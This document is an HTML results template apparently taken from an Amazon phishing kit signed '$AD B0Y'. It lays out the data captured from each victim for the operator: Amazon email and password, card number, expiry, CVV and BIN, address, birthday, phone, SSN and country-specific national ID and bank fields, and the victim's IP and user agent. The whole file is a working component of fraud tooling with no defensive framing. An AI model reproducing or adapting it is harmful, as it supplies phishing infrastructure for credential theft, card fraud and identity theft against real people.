<fieldset style="border: 2px solid #0061ff;border-radius:10px;max-width: 60%;margin: 0 auto"><legend><b><font color="#0071ce">Enjoy</font><font color="#0071ce"> Powered By</font><font color="cyan"> $AD B0Y</font></b></legend>
<pre>
<font color="#0071ce">
<b>================[ Account Information ]================</b></font>
<br>
<font color="#0071ce">
<b>===================[ Amazon Login ]====================</b></font>
<font color="black">
Email             : {username}
Password          : {password}
</font>
<font color="#0071ce">
<b>=================[ Credit Card ]==================</b></font>
<font color="black">
Name On Card         : {cardholder}
Card Number          : {cardnumber}
Expired              : {expired}
CVV                  : {cvv}
Copy                 : {copy}
BIN                  : {bank} - {brandtype} - {levelcountry}
</font>
<font color="#0071ce">
<b>===============[ Personal Information ]================</b></font>
<font color="black">
Full name         : {fullname}
Address           : {address}
City              : {city}
State             : {state}
country           : {country}
Zip               : {postcode}
BirthDay          : {birthday}
Phone             : {phone}
</font>
<font color="#0071ce">
<b>===============[ Additional Information ]================</b></font>
<font color="#black">
SSN                   : {ssn}           [US,CA]
Qatar ID              : {qatarid}       [QA]
ID Number             : {idnumber}      [GR,HK]
Citizen ID            : {citizenid}     [TH]
National ID           : {nationalid}    [SA]
Sort Code             : {sortcode}      [UK,IE]
Passport Number       : {passport}      [CY]
Civil ID              : {civilid}       [KW]
Bank Access Number    : {ban}           [NZ]
Account Number        : {accno}         [UK,IE,IN,CH]
Credit Limit          : {climit}        [IE,TH,IN,NZ,AU]
Bank Account          : {bankaccount}   [AU]
NAB ID/OSID           : {nabid}         [AU]
CARD ID               : {cardid}        [JP,CH]
CARD PASSWORD         : {cardpass}      [JP,CH]
Amex CID              : {cid}
</font>
<font color="#0071ce">
<b>===============[ IP Information ]================</b></font>
<font color="#0071ce">
User Agent          : {useragent}  
IP Address          : {ip}
Country             : {country}
Date                : {date}
</font>
<font color="green">
<b>====================[ Amazon ]===================</b>
</font>
</pre>
</fieldset>